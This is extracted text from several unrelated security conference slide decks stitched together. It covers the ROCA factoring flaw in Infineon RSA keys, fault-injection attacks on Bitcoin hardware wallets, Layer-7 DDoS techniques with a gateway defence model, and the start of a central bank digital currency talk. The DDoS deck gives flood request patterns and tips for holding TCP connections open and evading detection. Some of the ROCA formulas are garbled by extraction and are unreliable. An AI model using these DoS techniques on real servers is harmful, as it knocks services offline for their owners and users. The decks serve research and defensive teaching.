– Stored only in the secure on-chip memory and not extractable
The whole analysis was performed solely using
RSA keys generated and exported from the
Infineon’s cards and tokens
Not based on any weakness in an RNG or any
additional side-channel information
2017/12/07
HITCON PACIFIC
49
https://crocs.fi.muni.cz/_media/public/papers/nemec_roca_ccs17_preprint.pdf
Infineon’s Primes
512-bit primes (RSA-1024) are generated by
• 𝐿 = 2 × 3 × 5 × ⋯ × 349 × 353 is fixed
– 475 bits, the product of the first 71 primes
• 𝑘 is a 37-bit random integer
• 𝑎 is a 135-bit random integer
– The order of the cyclic subgroup 65537 in
the multiplicative group ℤ𝑀
∗ has 135 bits
• Entropy: 37 + 135 = 172 bits
2017/12/07
HITCON PACIFIC
50
𝑝 = 𝑘 × 𝐿 + 65537𝑎 mod 𝐿
Why the Formula?
Infineon’s prime generation is much faster than
the textbook method
– For small prime 𝑝 ≤ 353, 𝑝|𝐿, 𝑝 ∤ 65537 ⇒ 𝑝 ∤ 𝑝
– All trial divisions of 𝑝 by small primes can be skipped
– Before any primality test, the probability that the
candidate 𝑝 is a prime has been much larger already
2017/12/07
HITCON PACIFIC
51
= 𝑘𝐿 + 65537𝑎 − 𝑡𝐿 for some 𝑡 ∈ ℤ
𝑝 = 𝑘 × 𝐿 + 65537𝑎 mod 𝐿
Fingerprint
RSA modulus 𝐿 is generated by Infineon’s chip
if and only if (almost) 𝑎 = log65537 𝐿 mod 𝐿 exists!
2017/12/07
HITCON PACIFIC
52
𝐿 = 𝑘 × 𝐿 + 65537𝑎 mod 𝐿
× 𝑘 × 𝐿 + 65537𝑎 mod 𝐿
= 𝑘 × 𝑘 × 𝐿 + 𝑘 × 65537𝑎 mod 𝐿 + 𝑘 × 65537𝑎 mod 𝐿
× 𝐿
+ 65537𝑎 mod 𝐿
65537𝑎 mod 𝐿
≡ 65537𝑎+𝑎 ≡ 65537𝑎 (mod 𝐿)
𝑝
𝑝
Discrete Logarithm
How hard is solving 𝐿 ≡ 65537𝑎 (mod 𝐿)?
– 135-bit group order, 65537 , is huge
– However
•
65537
divides ℤ𝑀
∗
by Lagrange Theorem
• ℤ𝑀
∗
= 𝜙 𝐿 = ς𝑡|𝑀 𝑡 − 1 is a product of small
primes, where 𝜙 is the Euler 𝜙 function
• Hence solving 𝐿 ≡ 65537𝑎 (mod 𝐿) by Pohlig-
Hellman algorithm (divide and conquer) is pretty easy
2017/12/07
HITCON PACIFIC
53
Naïve Factoring
Once 𝑎 is found, try all possible 𝑎 (hence
respective 𝑎 is determined), and solve for 𝑘 by
Coppersmith’s algorithm, then 𝑝 is obtained
However, it fails since there are too many
possibilities (≈ 2135) for 𝑎
Solution: Try smaller 𝐿′|𝐿 and keep primes of
the same form
2017/12/07
HITCON PACIFIC
54
𝐿 = 𝑝 × 𝑝 = 𝑘 × 𝐿 + 65537𝑎 mod 𝐿
× 𝑘 × 𝐿 + 65537𝑎 mod 𝐿
≡ 65537𝑎+𝑎 ≡ 65537𝑎 (mod 𝐿)
Practical Factoring
𝐿′ has 286 bits with 𝐿′|𝐿
The cyclic subgroup 65537 in ℤ𝑀′
∗
has 31-bit
order (possibilities of 𝑎′), which is small enough
Find 𝑎′, try all possible 𝑎′ (so respective 𝑎′ is
determined), and solve for 𝑘′ (226 bits) by
Coppersmith’s algorithm, then 𝑝 is obtained
2017/12/07
HITCON PACIFIC
55
𝐿 = 𝑝 × 𝑝 = 𝑘′ × 𝐿′ + 65537𝑎′ mod 𝐿′
× 𝑘′ × 𝐿′ + 65537𝑎′ mod 𝐿′
≡ 65537𝑎′+𝑎′ ≡ 65537𝑎′ (mod 𝐿′)
RSA 1024 & 2048
97.1 CPU days to factor an RSA-1024
modulus produced by Infineon chips
– Parallelization is straightforward
– Less than 1 day if parallelized with 100 cores
140.8 CPU years to factor an RSA-2048
modulus produced by Infineon chips
2017/12/07
HITCON PACIFIC
56
Impacts
At least tens of millions devices around the world are affected
2017/12/07
HITCON PACIFIC
57
https://crocs.fi.muni.cz/public/papers/rsa_ccs17
Morals
Taking shortcut to enhance efficiency
– might compromise security
– hence very dangerous
Secret crypto design
– delays the discovery of flaws
– hence impacts are increased
2017/12/07
HITCON PACIFIC
58
References
KRACK
– https://www.krackattacks.com
ROCA
– https://crocs.fi.muni.cz/public/papers/rsa_ccs17
2017/12/07
HITCON PACIFIC
59
Thank You!
2017/12/07
HITCON PACIFIC | pdf |
Breaking Bitcoin Hardware Wallets
Glitches cause stitches!
Josh Datko
Chris Quartier
Kirill Belyayev
Updated: 2017/07/07
Link Drop!
All updated references, notes, links, can be found here:
https://www.cryptotronix.com/breakingbitcoin
The bug that started it all
1
bool storage_is_pin_correct(const char *pin)
2
{
3
return strcmp(shadow_config.storage.pin ,
4
pin) == 0;
5
}
On the STM32F205, when the first pin character is wrong it returns
in 100ns. When the fourth was wrong, it returned in about 1100ns.
If this was there, what else could we find?
Broken Window Theory for Bugs
Initial Attack Plan
1. Send change_pin via
Python.
2. Watch the return over
USB–measure when the PIN
failed.
3. Profit?!
Prevents
retries
with
a
busy wait loop.
Back off timer
ChipWhisperer
1
This talk
Fault Attacks
Bitcoin Hardware
Wallets
ChipWhisperer
One slide intro to Fault Attacks
Definition
An attack that applies an external stress on electronic system,
which generates a security failure2.
Two Parts:
1. Fault Injection
◦ Vcc glitching
◦ Clock glitching
2. Fault Exploitation
◦ Nicolas Bacca suggested glitching flash ops3, we wanted to
bypass the PIN as it was closer to ChipWhisperer examples.
Our Motivation
What happens when you apply the ChipWhisperer to the
STM32F205 (F205)?
# Is the F205 vulnerable to fault injection?
# Is the TREZOR firmware exploitable via a fault?
# How do we raise awareness for these kinds of attacks?
We just press the glitch button right?
# Turns out, you can’t just
shake the wallet and have
BTC fall out.
# Requires some RE to
determine voltages, test
points, how to modify the
firmware, etc...
# HW Wallets went OOS :(
Exhaust the supply chain
How to slow down attacks
The Fail Train Cometh
# Clock glitching kinda worked? It made Windows USB very sad
:(
# Rebooting unsigned firmware is teh suck (buttons to press).
# Timing analysis was working, but power analysis with CW was
not.
# Logic level conversion is proof that the singularity is far away.
# Lots of scotch.
Or why don’t we just make our own TREZOR?
F-it dude, let’s go bowling.
And now for something completely different
Before we get to the new hardware, we tried two other paths.
# De-scrambling the pin via OpenCV to automate testing.
# Decapping the STM32F205
I spy with my little eye
Decap all the things!
We are silicon n00bs
# TBH, I just wanted to a cool silicon pic for DEF CON :)
# Decapping-as-a-Service exists though (Dangerous
Prototypes)
# I asked smarter people about this:
◦ Cheap images don’t tell you much.
◦ Some interconnects are exposed.
◦ Maybe flip bits during runtime?
All the decap pics are on the website.
Want more pics?
Breaking Bitcoin Board
# Fits the ChipWhisperer UFO format
# It is also a TREZOR clone.
# Through-hole XTAL for more fun :)
# On board glitch hardware to attack without a ChipWhisperer
Glitch on the cheap
A better setup
There’s always a Rev B
Loop, what loop?
1
void glitch1(void)
2
{
3
//Some fake variable
4
volatile uint8_t a = 0;
5
putch(’A’);
6
// Should be an infinite loop
7
8
while(a != 2){;}
9
10
uart_puts("1234");
11
while (1) {;}
12
}
Loop, what loop?
Ooof, that hurts
1
void glitch_infinite(void)
2
{
3
char str [64]; unsigned int k = 0;
4
//This also adds lots of SRAM access
5
volatile uint16_t i, j;
6
volatile uint32_t cnt;
7
while (1){
8
cnt = 0; trigger_high ();trigger_low ();
9
for(i=0; i <200; i++){
10
for(j=0; j <200; j++){cnt ++;}}
11
sprintf(str , "%lu %d %d %d\n",
12
cnt , i, j, k++);
13
uart_puts(str);}}
Ooof, that hurts
Ooof, that hurts
O Password, My Password
1
void glitch3(void)
2
{
3
char passwd [] = "touch";char passok = 1;
4
for(cnt = 0; cnt < 5; cnt ++){
5
if (inp[cnt] != passwd[cnt]){
6
passok = 0;}}
7
if (! passok){
8
uart_puts("Denied\n"); while (1);
9
} else {
10
uart_puts("Welcome\n");
11
}
12
13
led_error (1);led_error (1);led_error (1);
14
}
O Password, My Password
O Password, My Password
Ok, how’d we do
# Is the F205 vulnerable to fault injection?
◦ Absolutely, yes.
# Is the TREZOR firmware exploitable via a fault?
◦ Maybe? We have thoughts on how to trigger but going from
example to exploit takes some work still.
◦ We talked to TREZOR and KeepKey about some issues.
# How do we raise awareness for these kinds of attacks?
◦ While not quite an unlooper device, our PCB will help you find
the BORE (Break Once Run Everywhere) attack.
Summary of Vulnerabilities
# STM32F205 is susceptible to fault attacks.
# KeepKey had a timing analysis bug on PIN verfication.
# TREZOR (and all clones) did not enable Clock Security System
in the MCU, allowing injection of clock faults.
# A few pieces of code that could be made to more resilient.
Don’t loose physical control of your wallet.
You really want to set PIN plus password.
Takeaway for wallet users
You will be glitched–can you trust your clock and VCC?
Takeaway for wallet designers
Defenses from Fault Attacks
Write code assuming you will be glitched! (Riscure RSA 2008)4
and The Sorcerer’s Apprentice Guide to Fault Attacks.
# Don’t use 0 and not 0, using Hamming distance.
# Count your functions!
# Check for complete loop completion.
# Add Random delay–makes triggering a bit harder.
# Check sensitive operations multiple times and compare
results.
# Use multiple MCUs and check results?!
Live Demo!
Let’s see some glitches!!!
Chipwhisperer vs. STM32F205
Endnotes
1https://wiki.newae.com/File:Cwlite_basic.png
2Encyclopedia of Cryptography and Security, 2nd Edition.
3https://www.slideshare.net/EricLarcheveque/bitcoin-hardware-wallets-security
4https://cryptotronix.files.wordpress.com/2017/07/paper_side_channel_
patterns.pdf | pdf |
DDoS Black and White
“Kungfu” Revealed
(DEF CON 20 Edition)
{Tony Miu (aka MT),
Anthony Lai (aka Darkfloyd),
Alan Chung (aka Avenir),
Kelvin Wong (aka Captain)}
Valkyrie-X Security Research Group
(VXRL)
Disclaimer
• There is no national secrets leaked here.
• Welcome to all national spies
• No real attacks are launched
• Please take it at your own risk. We can't
save you from the jail
Agenda
• Members introduction
• Research and Finding
– Part 1: Layer-7 DoS vulnerability analysis
and discovery.
– Part 2: Powerful Zombie
– Part 3: Defense Model
Biographies
Tony Miu (aka MT)
•Apart from a being a researcher at VXRL, MT currently
holds the post of Deputy SOC Manager at Nexusguard
Limited, a global provider of premium end to end web
security solutions that specializes in Anti-DDoS & web
application security services. Throughout his tenure, MT
has been at the forefront of the cyber war zone -
responding to and mitigating myriads of cyber attacks that
comes in all forms and manners targeted at crushing their
clients' online presence.
•MT's task is clearly critical. It is therefore imperative that
MT be well versed in the light and dark sides of DDoS
attack methodologies and undertakes many leading role in
both DDoS kungfu and defense model projects.
Biographies
Anthony Lai (aka Darkfloyd)
• focuses on reverse engineering and malware
analysis as well as penetration testing. His
interest is always falling on CTF and analyzing
targeted attacks.
• He has spoken in Black Hat USA 2010, DEF
CON 18 and 19, AVTokyo 2011, Hack In Taiwan
2010 and 2011 and Codegate 2012.
• His most recent presentation at DEF CON was
about APT Secrets in Asia.
Biographies
Alan Chung (aka Avenir)
• Avenir has more than 8 years working
experience on Network Security. He currently is
working as a Security Consultant for a
Professional Service provider.
• Alan specializes in Firewall, IDS/IPS, network
analysis, pen-test, etc. Alan’s research interests
are Honeypots, Computer Forensics,
Telecommunication etc.
Biographies
Kelvin Wong (aka Captain)
• Works in law enforcement over 10 years
responsible for forensics examination and
investigation; research and analysis.
• Deals with various reported criminal cases
about Hacking, DDoS and network
intrusion;
• A real frontline officer fights against the
criminals and suspects.
Research and Findings
Research Methodology
• We have applied Layer 7 techniques for
DoS:
– HTTP GET and POST methods
– Malformed HTTP
– HTTP Pipelining
– Manipulate TCP x HTTP vulnerabilities
Techniques Overview : Pre-Attack
• Find out any HTTP allowed methods
• Check whether a site accepts POST method as well
even it accepts GET method in the Web form
• Check out any resources-intensive function like
searching and any function related to database retrieval.
• Check out any HTTP response with large payload
returned from the request.
• Check out any links with large attachment including .doc
and .pdf files as well as media (.mp4/mp3 files) (i.e.
JPEG could be cached)
• Check whether HTTP response is cached or not
• Check whether chunked data in HTTP response packet
from the target is allowed.
Techniques Overview :
Attack Techniques
Attack Combo #1:
• Manipulate the TCP and HTTP characteristics
and vulnerabilities
• Find URL which accepts POST -> Change
Content Length to 9999 (i.e. abnormal size >
1500 bytes) bytes -> See whether it keeps the
connection alive
(Attack Combo #1 Detailed explanation in Part 2)
Techniques Overview :
Post-Attack Techniques
Attack Combo #1:
With POST method allowed, we could guess and
learn the behavior and devices behind:
• Check the TCP established state timeout value
• Check the TCP first PSH/ACK timeout value
• Check the TCP continuous ACK timeout value
• Check the TCP first FIN_WAIT1 timeout value
• Check the TCP last ACK timeout value
• It is an incomplete HTTP packet, which cannot
be detected and it is treated as a data trunk.
Techniques Overview :
Post-Attack Techniques
Attack Combo #1 (Continue):
• Wait for FIN/ACK – Initiated by target’s server
• Wait for RST/ACK – Initiated by requestor,
target’s server or CDN
• Wait for RST – Initiated by device like IDS, IPS,
etc
• Submit a packet to the target with wrong IP
checksum and check whether there is any
replied packet.
Techniques Overview :
Post-Attack Techniques
Goals
• Calculation of resources to bring down the
target
• Estimation of the detection
• Guess its DDoS mitigation
• Submit an incomplete HTTP POST packet
attack to the back-end server.
Techniques Overview :
Attack Techniques
Attack Combo #2:
• Manipulate the vulnerabilities due to poor
server hardening.
• Accept incomplete HTTP request (i.e.
accept simple HTTP request connection
including fields like HOST, Connection and
ACCEPT only)
Simple GET attack pattern in 4
years ago
• GET / HTTP/1.1\r\n
Host: www.xxx.com\r\n
User-Agent: Mozilla/4.0\r\n
Connection: keep-alive\r\n\r\n
• The site does not check cookie value, referral
value.
• It means there is NO HARDENING
• User-Agent value: Mozilla/4.0\r\n is a common
botnet used “label”, however, it still could accept
Techniques: Attack Techniques
Attack Combo #2:
• Whether it accepts HTTP pipelining
– It is a RFC standard but rare to use
GET / HTTP/1.1\r\nHost: www.xxxxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\nGET /?123
HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\n\r\n")
Techniques: Attack Techniques
Attack Combo #2:
- Utilize the packet size with 1460 byte size in
PSH/ACK packet
- A packet could be multiplied 7 times or more
- For pipelining, for example, HTTP packet is
not properly ended without \r\n\r\n, which may
bypass the detection and filter, as it is not
deemed as a HTTP packet.
Techniques: Attack Techniques
Attack Combo #2:
• Finding large-size packet data payload like
picture and audio files, which could not be
cached and authentication check (like
CAPTCHA) in prior.
• Goals:
– Increase loading of server and CPU and
memory usage
– Increase the bandwidth consumption
Techniques: Attack Techniques
Attack Combo #2:
• Session – Force to get a new session and connection
without cache. It could “guarantee” bypass loadbalancer
and Proxy.
• It is hard to remove it.
• If trying to drop the URL with “?”, it causes dropping the
normal request:
– For example, http://www.abc.com/submitform.asp?
234732893845DS4fjs9....
– Cache:no cache and expiry date is 1994
Techniques: Attack Techniques
•
Attack Combo #2
GET /download/doc.pdf?121234234fgsefasdfl11 HTTP/1.1\r\n
Host: www.xxxxyyyyzzzz.com\r\n
User-Agent: Mozilla/4.0\r\n
Connection: keep-alive\r\n
GET /download/doc.pdf?121234234fgsefasdfl22 HTTP/1.1\r\n
Host: www.xxxxyyyyzzzz.com\r\n
User-Agent: Mozilla/4.0\r\n
Connection: keep-alive\r\n
GET /download/doc.pdf?121234234fgsefasdfl33 HTTP/1.1\r\n
Host: www.xxxxyyyyzzzz.com\r\n
User-Agent: Mozilla/4.0\r\n
Connection: keep-alive\r\n
GET /download/doc.pdf?121234234fgsefasdfl44 HTTP/1.1\r\n
Host: www.xxxxyyyyzzzz.com\r\n
User-Agent: Mozilla/4.0\r\n
Connection: keep-alive\r\n
Techniques: Attack Techniques
•
Attack Combo #2
GET /download/doc.pdf?121234234fgsefasdfl55 HTTP/1.1\r\n
Host: www.xxxxyyyyzzzz.com\r\n
User-Agent: Mozilla/4.0\r\n
Connection: keep-alive\r\n
GET /download/doc.pdf?121234234fgsefasdfl66 HTTP/1.1\r\n
Host: www.xxxxyyyyzzzz.com\r\n
User-Agent: Mozilla/4.0\r\n
Connection: keep-alive\r\n
GET /download/doc.pdf?121234234fgsefasdfl77 HTTP/1.1\r\n
Host: www.xxxxyyyyzzzz.com\r\n
User-Agent: Mozilla/4.0\r\n
Connection: keep-alive\r\n
GET /download/doc.pdf?121234234fgsefasdfl88 HTTP/1.1\r\n
Host: www.xxxxyyyyzzzz.com\r\n
User-Agent: Mozilla/4.0\r\n
Connection: keep alive\r\n\r\n
We follow RFC all the time
Our Test Targets
•United State ( 40 )
•Europe (20)
•Asia Pacific (20)
Case Studies:
It will be discussed on stage
Agenda
• Members introduction
• Research and Finding
– Part 1: Layer-7 DoS vulnerability analysis and
discovery.
– Part 2: Core Attack Concept and Empower
a Zombie
– Part 3: Defense Model
Before taking Appetizer, let us
do the demo
Let us give three demos:
Attack Server: Backtrack 5, 512M Ram, 2 CPU (VM)
Web Server: Windows server 2008 R2, IIS 7.5 with a text web
page, 2G RAM, no application and database, hardware PC.
1.Attack target server and stuck TCP state TIME_WAIT
2.Attack target server and stuck TCP state FIN_WAIT1
3.Attack target server and stuck TCP state Established
7/11/12
Attack Goal
Demo 1: Cause server unstable
Demo 2: Cause the unavailability of service
in a minute
Demo 3: Cause the unavailability of service
instantly
7/11/12
Demo time
7/11/12
What are the theories and
ideas behind Demos 1-3?
7/11/12
Core Attack Concept
•
Don’t focus on HTTP method. This server is not
killed by HTTP related vulnerability.
Otherwise,
•
HTTP GET flood - unstable and high CPU
•
HTTP POST flood - unstable and high CPU
•
HTTP HEAD flood - unstable and high CPU
•
HTTP XXX flood - xxxx and high xxxx only
•
Demo 1 attack also unstable and high CPU only
We are not DoS attack to OS
and Programming Language
•
This attack is against to a kind of OS and
programming language. e.g. Apache killer, etc.
•
Our Attack FOCUS is on Protocol – TCP and
HTTP, we are going to do a TCPxHTTP killer.
•
Any server not using TCP and HTTP?
We do not present IIS killer, Apache killer, Xxx
killer!!!
TCP state is the key
• Focus on TCP state.
• Use the HTTP as an example to control the TCP state.
• Manipulate the TCP and HTTP characteristics and
vulnerabilities
• Server will reserve resource for different TCP states.
• The Same Layer 7 Flood to Different targets can
different TCP state.
• TCP state attack is decided upon various cases,
depends on web application, OS and HTTP Method.
• The key is based on reply of server. E.g. Fin-Ack, RST,
RST-Ack, HTTP 200, HTTP 30…etc.
Logical Diagram
Super combo Period =TCP State
7/11/12
Health Point = Server
resource
Hits = TCP
Connection
Kyo = Attack server
Super combo
= HTTP
Request
High
CPU
Andy in
fire =
Web
server
Keep Super Combo to Andy
•We wish to extent the super combo period!!!
•We will discuss the 3 different TCP states.
•Targeted TCP state:
• Demo 1. TCP TIME_WAIT
• Demo 2. TCP FIN_WAIT_1
• Demo 3. TCP ESTABLISHED
P.S. In King Of Fight 2003, it is bug.
Demo 1. TCP STAT TIME_WAIT
From RFC:
“When a connection is closed actively, it MUST linger in TIME-WAIT
state for a time 2xMSL (Maximum Segment Lifetime). However, it
MAY accept a new SYN from the remote TCP to reopen the connection
directly from TIME-WAIT state, if it:
(1)assigns its initial sequence number for the new connection to be
larger than the largest sequence number it used on the previous
connection incarnation, and
(2) returns to TIME-WAIT state if the SYN turns out to be an old
duplicate”
Demo 1. TCP STAT TIME_WAIT
•Demo 1 is simulating the most common DDoS attack.
•RFC: “Server is waiting for a connection termination
request from the local user.” Depends on OS, time out
around 60s.
•Web server are only with high CPU usage and in unstable
status
Demo 1. TCP STAT TIME_WAIT
Just like a light punch, easy to defense~
Fix:
•Harden Server TCP parameters
•Most of network security devices can set the timeout (e.g.
Proxy, firewall, DDoS mitigation device)
Demo 1. TCP STAT TIME_WAIT
Demo 1 – The Key for goal
• Check the TCP last ACK timeout value
• Wait for RST – Initiated by device like
IDS, IPS, etc.
7/11/12
Demo1 – The Key for Goal
TBC
7/11/12
Demo 2. TCP FIN_WAIT_1
Demo 2. TCP FIN_WAIT_1
From RFC:
“FIN-WAIT-1 STATE
In addition to the processing for the ESTABLISHED state, if our FIN is now acknowledged then
enter FIN-WAIT-2 and continue processing in that state.
FIN-WAIT-2 STATE
In addition to the processing for the ESTABLISHED state, if the retransmission queue is empty,
the user's CLOSE can be acknowledged ("ok") but do not delete the TCB.
CLOSE-WAIT STATE
Do the same processing as for the ESTABLISHED state.
CLOSING STATE
In addition to the processing for the ESTABLISHED state, if the ACK acknowledges our FIN then
enter the TIME-WAIT state, otherwise ignore the segment.
LAST-ACK STATE
The only thing that can arrive in this state is an acknowledgment of our FIN. If our FIN is now
acknowledged, delete the TCB, enter the CLOSED state, and return.
TIME-WAIT STATE
The only thing that can arrive in this state is a retransmission of the remote FIN. Acknowledge it,
and restart the 2 MSL timeout.”
Demo 2. TCP FIN_WAIT_1
•Depends on OS, time out around 60s and hard to fine tune in Server.
•RFC: “Client can still receive data from the server but will no longer accept
data from its local application to be sent to the server.”
•Server will allocate resource to handle web service
•Web application will keep holding the resource and memory overflow during
the attack
•Most of network security devices can set the timeout value, but easy to crush
the web application….
Demo 2 - The Key for goal
• Check the TCP first FIN_WAIT1 timeout
value
• Wait for RST/ACK – Initiated by
requestor, target’s server or CDN
7/11/12
Demo 2 - The Key for goal
TBC
7/11/12
Demo 3. TCP Established
Demo 3. TCP Established
•RFC: ” represents an open connection, data received can be delivered to the
user. The normal state for the data transfer phase of the connection.”
•TCP Established, it is an active connection.
•Server will allocate a lot resource to handle web service and web application.
•The time out of TCP Established state is very long. (around 3600s)
•The time out of TCP Established state can’t be too short.
•Compare all of the other TCP state, this case will use most of resource in the
server.
Demo 3. TCP Established
•
Base on the design of HTTP method, we can force the server to use
more resources.
•
Fragmented and incomplete packet continuously
•
In this example:
-
HTTP POST Method + “Content-length: 99999”
•
HTTP GET Method with packet size over 1500 without
“\r\n\r\n”, are same result.
•
It is an incomplete HTTP request
•
Timeout depends on application and server, may be 30s, 5mins,
10mins or more.
•
Incomplete HTTP request can bypass the Network Security devices.
Demo 3. Vs Slowloris
Slowloris:
Slowloris is extent the TCP Established State in ONE connections. Just
like we try to dig a hole(HTTP request) on the ground(Server resource)
and fill in the water(packets) slowly.
Our Demo 3
Our Demo 3, it is find out the max size of hole, and dig many of holes .
The size is random.
Demo 3 - The Key for goal
•
Check the TCP establishment timeout value
•
Check the TCP first PSH/ACK timeout value
•
Check the TCP continuous ACK timeout value
•
Wait for FIN/ACK – Initiated by target’s server
•
Submit a packet to the target with wrong IP checksum
and check whether there is any replied packet.
•
It is an incomplete HTTP packet, which cannot be
detected and it is treated as a data trunk.
7/11/12
Demo 3 - The Key for goal
TBC
7/11/12
Attack Conclusion
For Demos 1-3
•
Signature-based detection cannot be useful to detect our
attack as the HTTP fields could be randomized.
•
Our attack is customized for each target individually.
•
For example, the content length is decided based on the
Web application and test the boundary values of rate limit
of any security and detection devices.
•
Confuse the security detection device with “look-like” real
HTTP request.
PoC of Case study
• Slowloris is a good example for Demo 3
• Demo 1-3 are PoC for the analysis result
and impact in Part 1.
7/11/12
We have a great weapon and need
a best solider
7/11/12
Before taking empower
Zombie ...
Let us give another demo:
Attack Server: Backtrack 5, 512M Ram, 2 CPU (VM)
Web Server: Windows server 2008 R2, IIS 7.5 with a text web
page, 2G RAM, no application and database, hardware PC.
7/11/12
Attack Goal
Empower a Zombie “without” established
any connection and intensive use of memory
and CPU
7/11/12
Demo
• We launched the attack with our designed
Zombie (in demo 4) with stuck TCP
Establish state (in demo 3) technique
7/11/12
Demo time
7/11/12
Our Zombie’s Design
7/11/12
Design Overview
•
Current DDoS mitigation method violates RFC
standard.
•
Our Zombie also adopt DDoS mitigation methods into
the design
•
Our Zombie’s protocol design “looks like” fulfilling a RFC
standard. We simply adopt the DDoS mitigation method
and design into our Zombie.
•
This solider design is for our Demo 3 attack technique.
7/11/12
1. Show Attack Server’s
Resources Status
7/11/12
2. Generating an attack
7/11/12
3. Show the target’s server
status
7/11/12
4. Show attack server status
AFTER attack
7/11/12
Zombie Features
• Our designed zombie could launch attack
against multiple targets
• All available layer-7 attack methods (e.g.
XXX flood) could fuck up the target.
• Most of the victims stuck in TCP
established state.
7/11/12
Design and power-up your
zombie
It could have many different types of solider.
E.g. Zombie + Syncookie, syncache, share
database with HTTP request……
7/11/12
Part 3: Defense Model
Existing DDoS mitigation
countermeasure
• TCP Layer Authentication
• HTTP Layer Authentication (redirect,
URL)
• HTTP Layer interrupt (Captcha)
• Signature base application detection
• Rate limit
7/11/12
Design Overview – Application
Gateway (AG)
• Develop the apache module for defense
Layer 7 DDoS.
•
Apache Web Service
•
Hardened Apache Server
•
Authentication code module
•
Control Policy module
•
Routing and Forwarding
Engine
•
GUI Control Panel
7/11/12
7/11/12
I have a Dream~
7/11/12
Apache Gateway with
Loadbalancers group
Custom Filter
by script
All zombie
suicide
All the DDoS
attack can auto
mitigated
7/11/12
POST / GET Flood to AG
(First handshake phase)
Attack example : GET / HTTP/1.1 or GET /
<some-url, but not our page> / 1.1
•If the Attack cannot be redirect
•
Check the HTTP field, and will drop the non standard
HTTP request.
•
Close the connection, and afterwards, attack
suspended.
•
(Most of the zombie cannot handle the redirect)
7/11/12
POST / GET Flood to AG
(First handshake phase) (cont.)
• If the Attack can be redirect
•
Response action
•
Redirect the Get Flood (Redirect 301) to phase 2, with new
session
•
Close the existing connection in AG
7/11/12
POST / GET Flood to AG
(Second handshake phase)
• User send the GET request with HTTP
field Referrer.
•
With Referrer (Allow Traffic):
•
Assign a checkable value and referrer value to the user’s
web browser
•
Optional : Require the client side running the formula
with JavaScript, and the result will be used in phase 3.
(use for increase the client side CPU usage.)
•
Redirect the request to phase 3 with new session
•
Close the current connection in AG
7/11/12
•
Without Referrer (Attack) (Drop Traffic) :
•
Close the connection
•
For HTTP POST request, it will be dropped instantly.
7/11/12
POST / GET Flood to AG
(Second handshake phase) (cont)
POST / GET Flood to AG
(Third handshake phase)
• User send the GET request to the
checking page with the checkable value
received in Phase 2.
•
Incomplete HTTP request will be dropped.
•
Set the passed traffic in the white list.
•
Set the connection limit per IP address
•
(eg. Block the IP address, over 10 request per minute.)
•
Set the limit per request, per URL
•
Set the time limit value.
•
Set the time out value.
7/11/12
Deploying mode
• Host mode
•
E.g. Develop a module in Apache
• Transparent mode
•
Easy to deploy; In front of Web server.
• Reverse proxy mode
•
Easy to deploy
• Load balancer mode
•
Same as proxy, but it cannot handle a high volume
bandwidth attack.
7/11/12
Best deployment location
• Before the firewall, behind the router
•
Analyzing and filtering over the high volume traffic happens in
the first place so as to prevent the high volume DoS attack.
• Behind the firewall (with content forward)
i.
The firewall redirects the http traffic to the apache gateway.
(eg. Check Point CVP or Juniper UTM Redirect Web Filtering)
ii.
After the HTTP traffic analysis, the clean traffic will be sent
back to the firewall.
iii.
The firewall will continue process the traffic by rule
7/11/12
Best deployment location (cont’)
• Behind the firewall (route mode, proxy mode)
i.
After the traffic analysis by the firewall, the traffic will pass
to the apache gateway
ii.
After the analysis, the clean traffic will route to the web
server
• Install & integrate with the web server
i.
The traffic input to the Apache gateway (filtering module)
ii.
After the Apache gateway (filtering module) analysis
complete
iii.
The (filtering module) will pass the traffic to the web page
module (or other web server program.)
7/11/12
Best deployment location (cont’)
• Integrated with the load balancer
i.
The http traffic will input to the Apache Gateway
ii. The Apache will process & analysis the HTTP
traffic
iii. The clean traffic will transfer to the load balancer
iv. The load balancer will load sharing the traffic to
the Web Server farm
7/11/12
Roadmap
Phase 1: Integrate the IDS/IPS, Firewall
and
black hole system with the
Layer-7 Anti-DDoS Gateway.
Phase 2: Develop the API for custom script
Phase 3: Develop a Blacklist on IP
addresses grouped by time and IP
address Blacklist system. and
Generation mechanism.
7/11/12
Thank you very much
for your listening
Tony: mt[at]vxrl[dot]org
Alan: avenir[at]vxrl[dot]org
Kelvin: captain[at]vxrl[dot]org
Anthony: darkfloyd[at]vxrl[dot]org | pdf |
Central bank digital currency
Threats and vulnerabilities
Defcon 29
Ian Vitek
CBDC Security
Central bank of Sweden, Sveriges Riksbank
Central bank digital currency
Threats and vulnerabilities
Presentation
Background
Detailed system description of the prototype
Vulnerabilities in the retail central bank digital currency prototype
Everything else
Solutions and summary
2
So where do we start?
Ian Vitek
• Started with pentests 1996.
• Interested in web application security, network layer 2
(the writer of macof), DMA attacks and local pin bypass
attacks (found some on iPhone).
Sveriges Riksbank (Central bank of Sweden)
Disclaimer: The views and opinions expressed in this presentation are those of the
presenter and do not necessarily represent the views and opinions of the
Riksbank.
3
The e-krona project
• Why central bank digital currency?
• Procurement
• Requirements
• Winning bid
• Work on the prototype phase 1 (year one)
The goal of this presentation is to share insights of the
security challenges of building a prototype of a two tier
retail central bank digital currency.
4
